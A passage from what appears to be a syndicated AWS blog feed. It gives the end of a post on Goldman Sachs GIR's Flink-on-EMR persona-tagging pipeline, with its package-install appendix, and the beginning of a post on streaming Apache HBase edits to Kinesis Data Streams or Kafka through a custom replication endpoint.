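        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println("Flink responded: " + response.body());
    }
}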

The end goal of the setup is to have a pipeline where GIR’s internal users can freely make requests to update contact data (which in this use case is tagging or untagging contacts with various personas), and then have the updated contact data uploaded back to the GIR contact store.

Upload the Flink job artifacts to Amazon EMR

GIR has a GitLab project on-premises for managing the contents of their Flink job. To trigger the first part of their workflow and deploy a new version of the Flink job onto the cluster, a GitLab pipeline is run that first creates a .zip file containing the Flink job JAR file, properties, and config files.

The preceding diagram depicts the sequence of events that occurs in the job upload:

  1. The GitLab pipeline is manually triggered when a new Flink job should be uploaded. This transfers the .zip file containing the Flink job to an Amazon Simple Storage Service (Amazon S3) bucket on the GIR AWS account, labeled as “S3 Deployment artifacts”.
  2. A Lambda function (“Upload Lambda”) is triggered in response to the create event from Amazon S3.
  3. The function first uploads the Flink job JAR to the Amazon EMR Flink cluster, and retrieves the application ID for the Flink session.
  4. Finally, the function uploads the application properties file to a specific S3 bucket (“S3 Flink Job Properties”).

Trigger the Flink job

The second part of the workflow handles the submission of the actual Flink job to the cluster when job requests are generated. GIR has a user-facing web app called Personalization Workbench that provides the UI for carrying out persona-tagging operations. Admins and internal Goldman Sachs users can construct requests to tag or untag contacts with personas via this web app. When a request is submitted, a data file is generated that contains the details of the request.

The steps of this workflow are as follows:

  1. Personalization Workbench submits the details of the job request to the Flink Data S3 bucket, labeled as “S3 Flink data”.
  2. A Lambda function (“Run Lambda”) is triggered in response to the create event from Amazon S3.
  3. The function first reads the job properties file uploaded in the previous step to get the Flink job ID.
  4. Finally, the function makes an API call to run the required Flink job.

Process data

Contact data is processed according to the persona-tagging requests, and the transformed data is then uploaded back to the GIR contact store.

The steps of this workflow are as follows:

  1. The Flink job first reads the application properties file that was uploaded as part of the first step.
  2. Next, it reads the data file from the second workflow that contains the contact and persona data to be updated. The job then carries out the processing for the tagging or untagging operation.
  3. The results are uploaded back to the GIR contact store.
  4. Finally, both successful and failed requests are written back to Amazon S3.

Continuous monitoring

The final part of the overall workflow involves continuous monitoring of the EMR cluster in order to ensure that GIR’s tagging workflow is stable and that the cluster is in a healthy state. To ensure that the highest level of security is maintained with their client data, GIR wanted to avoid unconstrained SSH access to their AWS resources. Being constrained from accessing the EMR cluster’s primary node directly via SSH meant that GIR initially had no visibility into the EMR primary node logs or the Flink web interface.

By default, Amazon EMR archives the log files stored on the primary node to Amazon S3 at 5-minute intervals. Because this pipeline serves as a central platform for processing many ad hoc persona-tagging requests at a time, it was crucial for GIR to build a proper continuous monitoring system that would allow them to promptly diagnose any issues with the cluster.

To accomplish this, GIR implemented two monitoring solutions:

  • GIR installed an Amazon CloudWatch agent onto every node of their EMR cluster via bootstrap actions. The CloudWatch agent collects and publishes Flink metrics to CloudWatch under a custom metric namespace, where they can be viewed on the CloudWatch console. GIR configured the CloudWatch agent configuration file to capture relevant metrics, such as CPU utilization and total running EMR instances. The result is an EMR cluster where metrics are emitted to CloudWatch at a much faster rate than waiting for periodic S3 log flushes.
  • They also enabled the Flink UI in read-only mode by fronting the cluster’s primary node with a network load balancer and establishing connectivity from the Goldman Sachs on-premises network. This change allowed GIR to gain direct visibility into the state of their running EMR cluster and in-progress jobs.

Observations, challenges faced, and lessons learned

The personalization effort marked the first-time adoption of Amazon EMR within GIR. To date, hundreds of personalization criteria have been created in GIR’s production environment. In terms of web visits and clickthrough rate, site engagement with GIR personalized content has gradually increased since the implementation of the persona-tagging system.

GIR faced a few noteworthy challenges during development, as follows:

Restrictive security group rules

By default, Amazon EMR creates its security groups with rules that are less restrictive, because Amazon EMR can’t anticipate the specific custom settings for ingress and egress rules required by individual use cases. However, proper management of the security group rules is critical to protect the pipeline and data on the cluster. GIR used custom-managed security groups for their EMR cluster nodes and included only the needed security group rules for connectivity, in order to fulfill this stricter security posture.

Custom AMI

There were challenges in ensuring that the required packages were available when using custom Amazon Linux AMIs for Amazon EMR. As part of Goldman Sachs development SDLC controls, any Amazon Elastic Compute Cloud (Amazon EC2) instances on Goldman Sachs-owned AWS accounts are required to use internal Goldman Sachs-created AMIs. When GIR began development, the only compliant AMI that was available under this control was a minimal AMI based on the publicly available Amazon Linux 2 minimal AMI (amzn2-ami-minimal*-x86_64-ebs). However, Amazon EMR recommends using the full default Amazon Linux 2 AMI because it has all the necessary packages pre-installed. This resulted in various startup errors with no clear indication of the missing libraries.

GIR worked with AWS support to identify and resolve the issue by comparing the minimal and full AMIs, and installing the 177 missing packages individually (see the appendix for the full list of packages). In addition, various AMI-related files had been set to read-only permissions by the Goldman Sachs internal AMI creation process. Restoring these permissions to full read/write access allowed GIR to successfully start up their cluster.

Stalled Flink jobs

During GIR’s initial production rollout, GIR experienced an issue where their EMR cluster failed silently and caused their Lambda functions to time out. On further debugging, GIR found this issue to be related to an Akka quarantine-after-silence timeout setting. By default, it was set to 48 hours, causing the clusters to refuse more jobs after that time. GIR found a workaround by setting the value of akka.jvm-exit-on-fatal-error to false in the Flink config file.

Conclusion

In this post, we discussed how the GIR team at Goldman Sachs set up a system using Apache Flink on Amazon EMR to carry out the tagging of users with various personas, in order to better curate content offerings for those users. We also covered some of the challenges that GIR faced with the setup of their EMR cluster. This represents an important first step in providing GIR’s users with complete personalized content curation based on their individual profiles and readership.

Acknowledgments

The authors would like to thank the following members of the AWS and GIR teams for their close collaboration and guidance on this post:

  • Elizabeth Byrnes, Managing Director, GIR
  • Moon Wang, Managing Director, GIR
  • Ankur Gurha, Vice President, GIR
  • Jeremiah O’Connor, Solutions Architect, AWS
  • Ley Nezifort, Associate, GIR
  • Shruthi Venkatraman, Analyst, GIR

About the Authors

Balasubramanian Sakthivel is a Vice President at Goldman Sachs in New York. He has more than 16 years of technology leadership experience and worked on many firmwide entitlement, authentication and personalization projects. Bala drives the Global Investment Research division’s client access and data engineering strategy, including architecture, design and practices to enable the lines of business to make informed decisions and drive value. He is an innovator as well as an expert in developing and delivering large scale distributed software that solves real world problems, with demonstrated success envisioning and implementing a broad range of highly scalable platforms, products and architecture.

Victor Gan is an Analyst at Goldman Sachs in New York. Victor joined the Global Investment Research division in 2020 after graduating from Cornell University, and has been responsible for developing and provisioning cloud infrastructure for GIR’s user entitlement systems. He is focused on learning new technologies and streamlining cloud systems deployments.

Manjula Nagineni is a Solutions Architect with AWS based in New York. She works with major Financial service institutions, architecting, and modernizing their large-scale applications while adopting AWS cloud services. She is passionate about designing big data workloads cloud-natively. She has over 20 years of IT experience in Software Development, Analytics and Architecture across multiple domains such as finance, manufacturing and telecom.

 
 


Appendix

GIR ran the following command to install the missing AMI packages:

yum install -y libevent.x86_64 python2-botocore.noarch \
device-mapper-event-libs.x86_64 bind-license.noarch libwebp.x86_64 \
sgpio.x86_64 rsync.x86_64 perl-podlators.noarch libbasicobjects.x86_64 \
langtable.noarch sssd-client.x86_64 perl-Time-Local.noarch dosfstools.x86_64 \
attr.x86_64 perl-macros.x86_64 hwdata.x86_64 gpm-libs.x86_64 libtirpc.x86_64 \
device-mapper-persistent-data.x86_64 libconfig.x86_64 setserial.x86_64 \
rdate.x86_64 bc.x86_64 amazon-ssm-agent.x86_64 virt-what.x86_64 zip.x86_64 \
lvm2-libs.x86_64 python2-futures.noarch perl-threads.x86_64 \
dmraid-events.x86_64 bridge-utils.x86_64 mdadm.x86_64 ec2-net-utils.noarch \
kbd.x86_64 libtiff.x86_64 perl-File-Path.noarch quota-nls.noarch \
libstoragemgmt-python.noarch man-pages-overrides.x86_64 python2-rsa.noarch \
perl-Pod-Usage.noarch psacct.x86_64 libnl3-cli.x86_64 \
libstoragemgmt-python-clibs.x86_64 tcp_wrappers.x86_64 yum-utils.noarch \
libaio.x86_64 mtr.x86_64 teamd.x86_64 hibagent.noarch perl-PathTools.x86_64 \
libxml2-python.x86_64 dmraid.x86_64 pm-utils.x86_64 \
amazon-linux-extras-yum-plugin.noarch strace.x86_64 bzip2.x86_64 \
perl-libs.x86_64 kbd-legacy.noarch perl-Storable.x86_64 perl-parent.noarch \
bind-utils.x86_64 libverto-libevent.x86_64 ntsysv.x86_64 yum-langpacks.noarch \
libjpeg-turbo.x86_64 plymouth-core-libs.x86_64 perl-threads-shared.x86_64 \
kernel-tools.x86_64 bind-libs-lite.x86_64 screen.x86_64 \
perl-Text-ParseWords.noarch perl-Encode.x86_64 libcollection.x86_64 \
xfsdump.x86_64 perl-Getopt-Long.noarch man-pages.noarch pciutils.x86_64 \
python2-s3transfer.noarch plymouth-scripts.x86_64 device-mapper-event.x86_64 \
json-c.x86_64 pciutils-libs.x86_64 perl-Exporter.noarch libdwarf.x86_64 \
libpath_utils.x86_64 perl.x86_64 libpciaccess.x86_64 hunspell-en-US.noarch \
nfs-utils.x86_64 tcsh.x86_64 libdrm.x86_64 awscli.noarch cryptsetup.x86_64 \
python-colorama.noarch ec2-hibinit-agent.noarch usermode.x86_64 rpcbind.x86_64 \
perl-File-Temp.noarch libnl3.x86_64 generic-logos.noarch python-kitchen.noarch \
words.noarch kbd-misc.noarch python-docutils.noarch hunspell-en.noarch \
dyninst.x86_64 perl-Filter.x86_64 libnfsidmap.x86_64 kpatch-runtime.noarch \
python-simplejson.x86_64 time.x86_64 perl-Pod-Escapes.noarch \
perl-Pod-Perldoc.noarch langtable-data.noarch vim-enhanced.x86_64 \
bind-libs.x86_64 boost-system.x86_64 jbigkit-libs.x86_64 binutils.x86_64 \
wget.x86_64 libdaemon.x86_64 ed.x86_64 at.x86_64 libref_array.x86_64 \
libstoragemgmt.x86_64 libteam.x86_64 hunspell.x86_64 python-daemon.noarch \
dmidecode.x86_64 perl-Time-HiRes.x86_64 blktrace.x86_64 bash-completion.noarch \
lvm2.x86_64 mlocate.x86_64 aws-cfn-bootstrap.noarch plymouth.x86_64 \
parted.x86_64 tcpdump.x86_64 sysstat.x86_64 vim-filesystem.noarch \
lm_sensors-libs.x86_64 hunspell-en-GB.noarch cyrus-sasl-plain.x86_64 \
perl-constant.noarch libini_config.x86_64 python-lockfile.noarch \
perl-Socket.x86_64 nano.x86_64 setuptool.x86_64 traceroute.x86_64 \
unzip.x86_64 perl-Pod-Simple.noarch langtable-python.noarch jansson.x86_64 \
pystache.noarch keyutils.x86_64 acpid.x86_64 perl-Carp.noarch GeoIP.x86_64 \
python2-dateutil.noarch systemtap-runtime.x86_64 scl-utils.x86_64 \
python2-jmespath.noarch quota.x86_64 perl-HTTP-Tiny.noarch ec2-instance-connect.noarch \
vim-common.x86_64 libsss_idmap.x86_64 libsss_nss_idmap.x86_64 \
perl-Scalar-List-Utils.x86_64 gssproxy.x86_64 lsof.x86_64 ethtool.x86_64 \
boost-date-time.x86_64 python-pillow.x86_64 boost-thread.x86_64 yajl.x86_64

Stream Apache HBase edits for real-time analytics

Post Syndicated from Amir Shenavandeh original https://aws.amazon.com/blogs/big-data/stream-apache-hbase-edits-for-real-time-analytics/

Apache HBase is a non-relational database. To use the data, applications need to query the database to pull the data and changes from tables. In this post, we introduce a mechanism to stream Apache HBase edits into streaming services such as Apache Kafka or Amazon Kinesis Data Streams. In this approach, changes to data are pushed and queued into a streaming platform such as Kafka or Kinesis Data Streams for real-time processing, using a custom Apache HBase replication endpoint.

We start with a brief technical background on HBase replication and review a use case in which we store IoT sensor data into an HBase table and enrich rows using periodic batch jobs. We demonstrate how this solution enables you to enrich the records in real time and in a serverless way using AWS Lambda functions.

Common scenarios and use cases of this solution are as follows:

  • Auditing data, triggers, and anomaly detection using Lambda
  • Shipping WALEdits via Kinesis Data Streams to Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) to index records asynchronously
  • Triggers on Apache HBase bulk loads
  • Processing streamed data using Apache Spark Streaming, Apache Flink, or Amazon Kinesis Data Analytics
  • HBase edits or change data capture (CDC) replication into other storage platforms, such as Amazon Simple Storage Service (Amazon S3), Amazon Relational Database Service (Amazon RDS), and Amazon DynamoDB
  • Incremental HBase migration by replaying the edits from any point in time, based on configured retention in Kafka or Kinesis Data Streams

This post progresses into some common use cases you might encounter, along with their design options and solutions. We review and expand on these scenarios in separate sections, in addition to the considerations and limits in our application designs.

Introduction to HBase replication

At a very high level, the principle of HBase replication is based on replaying transactions from a source cluster to the destination cluster. This is done by replaying WALEdits or Write Ahead Log entries on the RegionServers of the source cluster into the destination cluster. To explain WALEdits, in HBase, all the mutations in data like PUT or DELETE are written to MemStore of their specific region and are appended to a WAL file as WALEdits or entries. Each WALEdit represents a transaction and can carry multiple write operations on a row. Because the MemStore is an in-memory entity, in case a region server fails, the lost data can be replayed and restored from the WAL files. Having a WAL is optional, and some operations may not require WALs or can request to bypass WALs for quicker writes. For example, records in a bulk load aren’t recorded in WAL.

HBase replication is based on transferring WALEdits to the destination cluster and replaying them so any operation that bypasses WAL isn’t replicated.

When setting up replication in HBase, you select a ReplicationEndpoint implementation in the replication configuration when creating a peer, and an instance of that ReplicationEndpoint runs as a thread on every RegionServer. In HBase, a replication endpoint is pluggable for more flexibility in replication and shipping WALEdits to different versions of HBase. You can also use this to build replication endpoints for sending edits to different platforms and environments. For more information about setting up replication, see Cluster Replication.
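For illustration, a peer that points at a pluggable endpoint can be registered programmatically roughly as follows. This is a hedged sketch against the HBase 2.x Admin API; the peer ID and endpoint class name are placeholders:

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.client.Admin;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.replication.ReplicationPeerConfig;

public class AddStreamingPeerSketch {
    public static void main(String[] args) throws Exception {
        Configuration conf = HBaseConfiguration.create();
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Admin admin = connection.getAdmin()) {
            // Point the peer at a custom ReplicationEndpoint implementation
            // instead of another HBase cluster (the class name is a placeholder).
            ReplicationPeerConfig peerConfig = ReplicationPeerConfig.newBuilder()
                    .setReplicationEndpointImpl("com.example.replication.StreamingReplicationEndpoint")
                    .build();
            admin.addReplicationPeer("streaming_peer", peerConfig);
        }
    }
}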

HBase bulk load replication HBASE-13153

In HBase, bulk loading is a method to directly import HFiles or Store files into RegionServers. This avoids the normal write path and WALEdits. As a result, far less CPU and network resources are used when importing big portions of data into HBase tables.

You can also use HBase bulk loads to recover data when an error or outage causes the cluster to lose track of regions and Store files.

Because bulk loads skip WAL creation, all new records aren’t replicated to the secondary cluster. In HBASE-13153, which is an enhancement, a bulk load is represented as a bulk load event, carrying the location of the imported files. You can activate this by setting hbase.replication.bulkload.enabled to true and setting hbase.replication.cluster.id to a unique value as a prerequisite.
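These prerequisites are typically set in hbase-site.xml on the cluster; the following is a minimal sketch of the equivalent programmatic configuration, with an example cluster ID:

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;

public class BulkLoadReplicationConfigSketch {
    public static Configuration create() {
        Configuration conf = HBaseConfiguration.create();
        // Replicate bulk load events to peers (disabled by default).
        conf.setBoolean("hbase.replication.bulkload.enabled", true);
        // A unique ID for this cluster, required when bulk load replication is enabled.
        conf.set("hbase.replication.cluster.id", "source-cluster-1");
        return conf;
    }
}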

Custom streaming replication endpoint

We can use HBase’s pluggable endpoints to stream records into platforms such as Kinesis Data Streams or Kafka. Transferred records can be consumed by Lambda functions, processed by a Spark Streaming application or Apache Flink on Amazon EMR, Kinesis Data Analytics, or any other big data platform.

In this post, we demonstrate an implementation of a custom replication endpoint that allows replicating WALEdits in Kinesis Data Streams or Kafka topics.

In our example, we built upon the BaseReplicationEndpoint abstract class, inheriting the ReplicationEndpoint interface.

The main method to implement and override is the replicate method. This method replicates a set of items it receives every time it’s called and blocks until all those records are replicated to the destination.

For our implementation and configuration options, see our GitHub repository.
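The overall shape of such an endpoint looks roughly like the following minimal sketch. It is heavily simplified; the implementation in the repository also handles serialization, batching, retries, and the Kinesis and Kafka producers:

import java.util.List;
import java.util.UUID;
import org.apache.hadoop.hbase.replication.BaseReplicationEndpoint;
import org.apache.hadoop.hbase.wal.WAL;

public class StreamingReplicationEndpointSketch extends BaseReplicationEndpoint {

    @Override
    public UUID getPeerUUID() {
        // A stable ID representing the "remote cluster" (here, the stream sink).
        return UUID.nameUUIDFromBytes("streaming-sink".getBytes());
    }

    @Override
    public boolean replicate(ReplicateContext replicateContext) {
        List<WAL.Entry> entries = replicateContext.getEntries();
        for (WAL.Entry entry : entries) {
            // Serialize the WALEdit and put it on the stream here.
            // Returning false (or throwing) makes HBase retry this batch.
        }
        return true; // acknowledge the batch so HBase ships the next one
    }

    @Override
    public void start() {
        startAsync();
    }

    @Override
    public void stop() {
        stopAsync();
    }

    @Override
    protected void doStart() {
        notifyStarted();
    }

    @Override
    protected void doStop() {
        notifyStopped();
    }
}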

Use case: Enrich records in real time

We now use the custom streaming replication endpoint implementation to stream HBase edits to Kinesis Data Streams.

The provided AWS CloudFormation template demonstrates how we can set up an EMR cluster with replication to either Kinesis Data Streams or Apache Kafka and consume the replicated records, using a Lambda function to enrich data asynchronously, in real time. In our sample project, we launch an EMR cluster with an HBase database. A sample IoT traffic generator application runs as a step in the cluster and puts records, containing a registration number and an instantaneous speed, into a local HBase table. Records are replicated in real time into a Kinesis stream or Kafka topic based on the selected option at launch, using our custom HBase replication endpoint. When the step starts putting the records into the stream, a Lambda function is provisioned and starts digesting records from the beginning of the stream and catches up with the stream. The function calculates a score per record, based on a formula on variation from minimum and maximum speed limits in the use case, and persists the result as a score qualifier into a different column family, out of replication scope in the source table, by running HBase puts on RowKey.
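To give a sense of the consumer side, the following is a simplified, hypothetical sketch of a Lambda handler that reads replicated records from the Kinesis stream and writes a score back into a separate column family with an HBase Put. The payload format, table name, column family, and scoring formula are illustrative placeholders rather than the exact code shipped in the sample project:

import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import com.amazonaws.services.lambda.runtime.Context;
import com.amazonaws.services.lambda.runtime.RequestHandler;
import com.amazonaws.services.lambda.runtime.events.KinesisEvent;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class SpeedScoreHandler implements RequestHandler<KinesisEvent, Void> {

    private static final double MIN_SPEED = 20.0;
    private static final double MAX_SPEED = 120.0;

    @Override
    public Void handleRequest(KinesisEvent event, Context context) {
        Configuration conf = HBaseConfiguration.create();
        conf.set("hbase.zookeeper.quorum", System.getenv("HBASE_ZK_QUORUM")); // placeholder
        try (Connection connection = ConnectionFactory.createConnection(conf);
             Table table = connection.getTable(TableName.valueOf("iot_speed"))) {
            for (KinesisEvent.KinesisEventRecord record : event.getRecords()) {
                ByteBuffer data = record.getKinesis().getData();
                byte[] bytes = new byte[data.remaining()];
                data.get(bytes);
                // Assume a simple "rowKey,speed" payload for illustration;
                // the real project deserializes replicated WALEdits instead.
                String[] fields = new String(bytes, StandardCharsets.UTF_8).split(",");
                String rowKey = fields[0];
                double speed = Double.parseDouble(fields[1]);
                double score = (speed - MIN_SPEED) / (MAX_SPEED - MIN_SPEED);
                Put put = new Put(Bytes.toBytes(rowKey));
                put.addColumn(Bytes.toBytes("enrich"), Bytes.toBytes("score"),
                        Bytes.toBytes(String.valueOf(score)));
                table.put(put); // written to a column family outside the replication scope
            }
        } catch (Exception e) {
            throw new RuntimeException("Failed to enrich records", e);
        }
        return null;
    }
}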

The following diagram illustrates this architecture.

To launch our sample environment, you can use our template on GitHub.

The template creates a VPC, public and private subnets, Lambda functions to consume records and prepare the environment, an EMR cluster with HBase, and a Kinesis data stream or an Amazon Managed Streaming for Apache Kafka (Amazon MSK) cluster depending on the selected parameters when launching the stack.

Architectural design patterns

Traditionally, Apache HBase tables are considered as data stores, where consumers get or scan the records from tables. It’s very common in modern databases to react to database logs or CDC for real-time use cases and triggers. With our streaming HBase replication endpoint, we can project table changes into message delivery systems like Kinesis Data Streams or Apache Kafka.

We can trigger Lambda functions to consume messages from Apache Kafka or Kinesis Data Streams in a serverless design, or use the wider Amazon Kinesis ecosystem, such as Kinesis Data Analytics or Amazon Kinesis Data Firehose, for delivery into Amazon S3. You could also pipe the records into Amazon OpenSearch Service.

A wide range of consumer ecosystems, such as Apache Spark, AWS Glue, and Apache Flink, is available to consume from Kafka and Kinesis Data Streams.

Let’s review few other common use cases.

Index HBase rows

Apache HBase rows are retrievable by RowKey. Writing a row into HBase with the same RowKey overwrites or creates a new version of the row. To retrieve a row, it needs to be fetched by the RowKey or a range of rows needs to be scanned if the RowKey is unknown.

In some use cases, scanning the table for a specific qualifier or value is expensive, so we index our rows asynchronously in another, parallel system like Elasticsearch. Applications can use the index to find the RowKey. Without this solution, a periodic job has to scan the table and write the rows into an indexing service like Elasticsearch to hydrate the index, or the producing application has to write to both HBase and Elasticsearch directly, which adds overhead to the producer.

Enrich and audit data

A very common use case for HBase streaming endpoints is enriching data and storing the enriched records in a data store, such as Amazon S3 or RDS databases. In this scenario, a custom HBase replication endpoint streams the records into a message distribution system such as Apache Kafka or Kinesis Data Streams. Records can be serialized, using the AWS Glue Schema Registry for schema validation. A consumer on the other end of the stream reads the records, enriches them, and validates against a machine learning model in Amazon SageMaker for anomaly detection. The consumer persists the records in Amazon S3 and potentially triggers an alert using Amazon Simple Notification Service (Amazon SNS). Stored data on Amazon S3 can be further digested on Amazon EMR, or we can create a dashboard on Amazon QuickSight, interfacing Amazon Athena for queries.

The following diagram illustrates our architecture.

Store and archive data lineage

Apache HBase comes with the snapshot feature. You can freeze the state of tables into snapshots and export them to any distributed file system like HDFS or Amazon S3. Recovering snapshots restores the entire table to the snapshot point.

Apache HBase also supports versioning at the row level. You can configure column families to keep row versions, and the default versioning is based on timestamps.

However, when using this approach to stream records into Kafka or Kinesis Data Streams, records are retained inside the stream, and you can replay any period covered by the stream’s retention. Recovering a snapshot only restores the table up to the snapshot point; records written after that point aren’t present.

In Kinesis Data Streams, by default records of a stream are accessible for up to 24 hours from the time they are added to the stream. This limit can be increased to up to 7 days by enabling extended data retention, or up to 365 days by enabling long-term data retention. See Quotas and Limits for more information.

In Apache Kafka, record retention has virtually no limits based on available resources and disk space configured on the Kafka cluster, and can be configured by setting log.retention.

Trigger on HBase bulk load

The HBase bulk load feature uses a MapReduce job to output table data in HBase’s internal data format, and then directly loads the generated Store files into the running cluster. Using bulk load uses less CPU and network resources than loading via the HBase API, as HBase bulk load bypasses WALs in the write path and the records aren’t seen by replication. However, since HBASE-13153, you can configure HBase to replicate a meta record as an indication of a bulk load event.

A Lambda function processing replicated WALEdits can listen to this event to trigger actions, such as automatically refreshing a read replica HBase cluster on Amazon S3 whenever a bulk load happens. The following diagram illustrates this workflow.

Considerations for replication into Kinesis Data Streams

Kinesis Data Streams is a massively scalable and durable real-time data streaming service. Kinesis Data Streams can continuously capture gigabytes of data per second from hundreds of thousands of sources with very low latency. Kinesis is fully managed and runs your streaming applications without requiring you to manage any infrastructure. It’s durable, because records are synchronously replicated across three Availability Zones, and you can increase data retention to 365 days.

When considering Kinesis Data Streams for any solution, it’s important to consider service limits. For instance, as of this writing, the maximum size of the data payload of a record before base64-encoding is up to 1 MB, so we must make sure the records or serialized WALEdits remain within the Kinesis record size limit. To be more efficient, you can enable the hbase.replication.compression-enabled attribute to GZIP compress the records before sending them to the configured stream sink.

Kinesis Data Streams retains the order of the records within the shards as they arrive, and records can be read or processed in the same order. However, in this sample custom replication endpoint, a random partition key is used so that the records are evenly distributed between the shards. We can also use a hash function to generate a partition key when putting records into the stream, for example based on the Region ID so that all the WALEdits from the same Region land in the same shard and consumers can assume Region locality per shards.

For delivering records in KinesisSinkImplemetation, we use the Amazon Kinesis Producer Library (KPL) to put records into Kinesis data streams. The KPL simplifies producer application development; we can achieve high write throughput to a Kinesis data stream. We can use the KPL in either synchronous or asynchronous use cases. We suggest using the higher performance of the asynchronous interface unless there is a specific reason to use synchronous behavior. KPL is very configurable and has retry logic built in. You can also perform record aggregation for maximum throughput. In KinesisSinkImplemetation, by default records are asynchronously replicated to the stream. We can change to synchronous mode by setting hbase.replication.kinesis.syncputs to true. We can enable record aggregation by setting hbase.replication.kinesis.aggregation-enabled to true.
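As a rough sketch (not the exact sink code in the repository), producing to Kinesis Data Streams through the KPL with these options looks like the following; the stream name, Region, and partition key are illustrative:

import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import com.amazonaws.services.kinesis.producer.KinesisProducer;
import com.amazonaws.services.kinesis.producer.KinesisProducerConfiguration;

public class KinesisProducerSketch {
    public static void main(String[] args) {
        KinesisProducerConfiguration config = new KinesisProducerConfiguration()
                .setRegion("us-east-1")          // illustrative AWS Region
                .setAggregationEnabled(true)     // pack multiple user records per Kinesis record
                .setRecordMaxBufferedTime(100);  // milliseconds to buffer before sending

        KinesisProducer producer = new KinesisProducer(config);

        byte[] serializedWalEdit = "example-waledit".getBytes(StandardCharsets.UTF_8);
        // A key derived from the HBase Region name keeps all WALEdits of one Region
        // in the same shard; a random key spreads the load evenly across shards.
        String partitionKey = "hbase-region-1234";
        producer.addUserRecord("hbase-edits-stream", partitionKey,
                ByteBuffer.wrap(serializedWalEdit));

        producer.flushSync(); // block until buffered records have been delivered
    }
}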

The KPL can incur an additional processing delay because it buffers records before sending them to the stream, based on a user-configurable attribute of RecordMaxBufferedTime. Larger values of RecordMaxBufferedTime result in higher packing efficiencies and better performance. However, applications that can’t tolerate this additional delay may need to use the AWS SDK directly.

Kinesis Data Streams and the Kinesis family are fully managed and easily integrate with the rest of the AWS ecosystem with minimum development effort with services such as the AWS Glue Schema Registry and Lambda. We recommend considering Kinesis Data Streams for low-latency, real-time use cases on AWS.

Considerations for replication into Apache Kafka

Apache Kafka is a high-throughput, scalable, and highly available open-source distributed event streaming platform used by thousands of companies for high-performance data pipelines, streaming analytics, data integration, and mission-critical applications.

AWS offers Amazon MSK as a fully managed Kafka service. Amazon MSK provides the control plane operations and runs open-source versions of Apache Kafka. Existing applications, tooling, and plugins from partners and the Apache Kafka community are supported without requiring changes to application code.

You can configure this sample project for Apache Kafka brokers directly or just point towards an Amazon MSK ARN for replication.

Although there is virtually no hard limit on message size in Kafka, the maximum message size is set to 1 MB by default, so we must make sure the records, or serialized WALEdits, remain within the maximum message size configured for the topic.

The Kafka producer batches records together whenever possible to limit the number of requests and improve efficiency. This behavior is configurable by setting batch.size, linger.ms, and delivery.timeout.ms.
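
A producer configuration touching those settings might look like the sketch below; the broker address and the specific values are assumptions for illustration, not tuning recommendations:

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerConfig;
import org.apache.kafka.common.serialization.ByteArraySerializer;
import org.apache.kafka.common.serialization.StringSerializer;

import java.util.Properties;

public class KafkaProducerConfigSketch {
    public static KafkaProducer<String, byte[]> buildProducer() {
        Properties props = new Properties();
        props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "broker1:9092");   // illustrative broker
        props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName());
        props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, ByteArraySerializer.class.getName());

        // Batching settings discussed above (illustrative values):
        props.put(ProducerConfig.BATCH_SIZE_CONFIG, 64 * 1024);        // batch.size: bytes per partition batch
        props.put(ProducerConfig.LINGER_MS_CONFIG, 20);                // linger.ms: wait up to 20 ms to fill a batch
        props.put(ProducerConfig.DELIVERY_TIMEOUT_MS_CONFIG, 120_000); // delivery.timeout.ms: overall send deadline

        // Keep individual requests within the broker/topic message size limit mentioned above.
        props.put(ProducerConfig.MAX_REQUEST_SIZE_CONFIG, 1_048_576);  // max.request.size: 1 MB

        return new KafkaProducer<>(props);
    }
}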

In Kafka, topics are partitioned, and partitions are distributed across the Kafka brokers. This distributed placement allows for load balancing of consumers and producers. When a new event is published to a topic, it’s appended to one of the topic’s partitions. Events with the same event key are written to the same partition, and Kafka guarantees that any consumer of a given topic partition always reads that partition’s events in exactly the order they were written. KafkaSinkImplementation uses a random partition key to distribute the messages evenly between the partitions. This could instead be based on a hash function, for example of the Region ID, if the order of the WALEdits or record locality is important to the consumers.
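
A sketch of sending a WALEdit with a Region-derived key is shown below; the method signature and names are illustrative and not taken from KafkaSinkImplementation itself:

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.clients.producer.RecordMetadata;

public class KeyedSendSketch {
    // The producer, topic name, and serialized WALEdit bytes are assumed to be
    // supplied by the surrounding sink implementation.
    static void sendWalEdit(KafkaProducer<String, byte[]> producer,
                            String topicName,
                            String encodedRegionName,
                            byte[] serializedWalEdit) {
        // Using the Region name as the record key lets Kafka's default partitioner
        // hash it to a fixed partition, preserving per-Region ordering for consumers.
        ProducerRecord<String, byte[]> record =
                new ProducerRecord<>(topicName, encodedRegionName, serializedWalEdit);

        producer.send(record, (RecordMetadata metadata, Exception exception) -> {
            if (exception != null) {
                System.err.println("send failed: " + exception.getMessage());
            } else {
                System.out.printf("sent to partition %d at offset %d%n",
                        metadata.partition(), metadata.offset());
            }
        });
    }
}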

Semantic guarantees

Like any streaming application, it’s important to consider the semantic guarantees of the message producer, how delivery of messages to the stream is acknowledged or failed, and how consumers checkpoint their progress. Based on our use case, we need to consider the following delivery semantics:

  • At most once delivery – Messages are never delivered more than once, and there is a chance of losing messages
  • At least once delivery – Messages can be delivered more than once, with no loss of messages
  • Exactly once delivery – Every message is delivered only once, and there is no loss of messages

